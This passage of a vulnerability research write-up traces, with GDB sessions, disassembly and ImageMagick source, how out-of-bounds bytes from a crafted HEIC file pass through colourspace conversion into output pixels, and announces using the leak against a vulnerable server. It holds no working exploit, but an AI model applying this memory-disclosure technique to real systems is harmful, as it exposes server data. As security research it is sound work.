        printf("Pixel data: %d %d %d\n", a, b, c);
    }
}

Back to dynamic analysis. Note that we are concerned with the data flow, and not the control flow. For simplicity, we will convert the vulnerable heic file into an rgb file instead of a png. According to the ImageMagick documentation, an rgb file contains “Raw red, green, and blue samples”. The first byte is the R value of the first pixel, the second byte the G value, and the third byte the B value. The fourth to sixth bytes describe the second pixel in the same way, and so on. You can verify that the values in the produced rgb file match the RGB values of the PNG output, and that the OOB bytes are output as expected. The reason for choosing this format is that, unlike PNG, which has an encoding algorithm, the rgb format stores the RGB values raw, which should make tracing their flow through the program easier. After we have a better understanding of the transformations, we can then apply the same concepts to the PNG format. Once again, we break at the first “heif_image_get_plane_readonly()” call. We also set an access watchpoint (awatch) on the OOB bytes.

(gdb) r convert 64x64_vuln.heic out.rgb
(gdb) x/8gx $rax+0x40*64
0x5555555acc60: 0x0000000000000000      0x0000000000000000
0x5555555acc70: 0x0000000000001020      0x0000000000001021
0x5555555acc80: 0x00005555555ae3d0      0x00005555555a3460
0x5555555acc90: 0x0000000000000000      0x0000000000000000
(gdb) set {long}0x5555555acc60 = 0x4847464544434241
(gdb) awatch *0x5555555acc60
Hardware access (read/write) watchpoint 3: *0x5555555acc60

The watchpoint gets hit in the SetPixelRed function, at ReadHEICImageByID+704 (SetPixelRed is inlined). Here, a byte from the OOB address is written into edx. $r15+$rax*1 == 0x5555555acc60 corresponds to the first OOB byte that we set a watchpoint on earlier.

(gdb) x/16i ReadHEICImageByID+704
   0x7ffff7e2e580 <ReadHEICImageByID+704>:      movzx  edx,BYTE PTR [r15+rax*1]
=> 0x7ffff7e2e585 <ReadHEICImageByID+709>:      pxor   xmm0,xmm0
   0x7ffff7e2e589 <ReadHEICImageByID+713>:      mov    rsi,rcx
   0x7ffff7e2e58c <ReadHEICImageByID+716>:      sub    rsi,r8
   0x7ffff7e2e58f <ReadHEICImageByID+719>:      cvtsi2sd xmm0,edx
   0x7ffff7e2e593 <ReadHEICImageByID+723>:      mov    rdx,rax
   0x7ffff7e2e596 <ReadHEICImageByID+726>:      sar    rdx,1
   0x7ffff7e2e599 <ReadHEICImageByID+729>:      add    rax,0x1
   0x7ffff7e2e59d <ReadHEICImageByID+733>:      mulsd  xmm0,xmm1
   0x7ffff7e2e5a1 <ReadHEICImageByID+737>:      cvtsd2ss xmm0,xmm0
   0x7ffff7e2e5a5 <ReadHEICImageByID+741>:      movss  DWORD PTR [rcx],xmm0
...
(gdb) info reg rax
rax            0x0                 0x0
(gdb) info reg r15
r15            0x5555555acc60      0x5555555acc60

We can see that our OOB byte is moved into edx, then into xmm0 (ReadHEICImageByID+719), and finally stored through the pointer in rcx (ReadHEICImageByID+741). This looks like where the quantum’s value is finally assigned, which the Ghidra decompilation corroborates. Notably, the “movss DWORD PTR [r??], xmm0” instruction appears three times in the disassembly, once for each of the three inlined set pixel functions. Breaking at ReadHEICImageByID+741, where the quantum’s value is set to our OOB byte, we can see the address that rcx points to and add a watchpoint for it as well. We can also read the value stored at that address. The value of 16705 corresponds to 257 * 0x41, which is the return value of the ScaleCharToQuantum() call, as discussed earlier.

(gdb) b *(ReadHEICImageByID+741)
Breakpoint 4 at 0x7ffff7e2e5a5: file ./MagickCore/pixel-accessor.h, line 856.
(gdb) c
...
(gdb) info reg rcx
rcx            0x5555555bb840      0x5555555bb840
(gdb) awatch *0x5555555bb840
Hardware access (read/write) watchpoint 5: *0x5555555bb840
(gdb) ni
...
(gdb) p/f *(float*)$rcx
$3 = 16705

As we continue execution, our two access watchpoints get hit a few times, but the first one isn’t used for anything interesting anymore. The first interesting access is in “TransformsRGBImage()”, and it occurs on our second access watchpoint. Here, GetPixelRed (also inlined) is called, which is a usage pattern that makes sense: first the quantum’s value is set with SetPixelRed, then it is retrieved with GetPixelRed for use in converting the colourspace from yCbCr to RGB. We can look through the source code of the TransformsRGBImage() function, but it is really long. Scanning through, it seems to use a switch statement whose cases are the various source colourspaces. Searching for the string “yCbCr” yields a promising result: a call to “ConvertYCbCrToRGB()”.

case YCbCrColorspace:
    {
      ConvertYCbCrToRGB(X,Y,Z,&red,&green,&blue);
      break;
    }

Going back a bit further in the source code, we see:

  double blue, green, red, X, Y, Z;
  X=QuantumScale*GetPixelRed(image,q);
  Y=QuantumScale*GetPixelGreen(image,q);
  Z=QuantumScale*GetPixelBlue(image,q);

So, our OOB value is assigned to X via the GetPixelRed() function. Note that QuantumScale is 1 / 65535, so multiplying by it is equivalent to dividing X by 257 (reversing the initial “ScaleCharToQuantum()” call) and then again by 255 (normalising the pixel value to between 0 and 1). X is then used by the “ConvertYCbCrToRGB()” function, which calls the “ConvertYPbPrToRGB()” function.

static void ConvertYPbPrToRGB(const double Y,const double Pb,const double Pr,
  double *red,double *green,double *blue)
{
  *red=QuantumRange*(0.99999999999914679361*Y-1.2188941887145875e-06*(Pb-0.5)+
    1.4019995886561440468*(Pr-0.5));
  *green=QuantumRange*(0.99999975910502514331*Y-0.34413567816504303521*(Pb-0.5)-
    0.71413649331646789076*(Pr-0.5));
  *blue=QuantumRange*(1.00000124040004623180*Y+1.77200006607230409200*(Pb-0.5)+
    2.1453384174593273e-06*(Pr-0.5));
}

This does a standard yCbCr to RGB conversion, and then scales the value up by QuantumRange == 65535. Finally, the quantum’s value is re-set with “SetPixelRed()”.

  SetPixelRed(image,ClampToQuantum(red),q);
  SetPixelGreen(image,ClampToQuantum(green),q);
  SetPixelBlue(image,ClampToQuantum(blue),q);

The function “ClampToQuantum()” restricts the quantum to the range 0 to 65535, the “QuantumRange”. This explains the abnormal relationship seen earlier between the OOB byte and the corresponding output RGB value: changing Y did increase red and blue as well, but their values were still negative and so were clamped. This can be shown by recreating the conversion function (shown below), and verified in GDB as well.

#include <stdio.h>

int main(void)
{
    double Y, Pb, Pr, red, green, blue;
    Y = 0.25490196078431371; // 65 * 257 / 65535
    Pb = 0;
    Pr = 0;

    // (Pb - 0.5) and (Pr - 0.5), factored out of the three expressions
    double dVar1, dVar2;
    dVar1 = Pb - 0.5;
    dVar2 = Pr - 0.5;
    red = ((Y * 0.9999999999991468 - dVar1 * 1.218894188714587e-06) + dVar2 * 1.401999588656144) *
           65535.0;
    green = ((Y * 0.9999997591050251 - dVar1 * 0.344135678165043) - dVar2 * 0.7141364933164679) *
             65535.0;
    blue = (Y * 1.000001240400046 + dVar1 * 1.772000066072304 + dVar2 * 2.145338417459327e-06) *
            65535.0;

    printf("%f %f %f\n", red, green, blue);
    // -29234.981581 51381.929355 -41359.061742
    return 0;
}

This is why, in the output image file, red and blue were bound to the minimum value of 0, while green was 200 ≈ 51381.929355 / 257 (199.93, rounded to the nearest integer).

In summary, the OOB bytes are converted with the “ConvertYPbPrToRGB()” algorithm, and have their values clamped between 0 and QuantumRange. In the next part, we will use what we have learnt about the vulnerability to exfiltrate useful information from a vulnerable server.
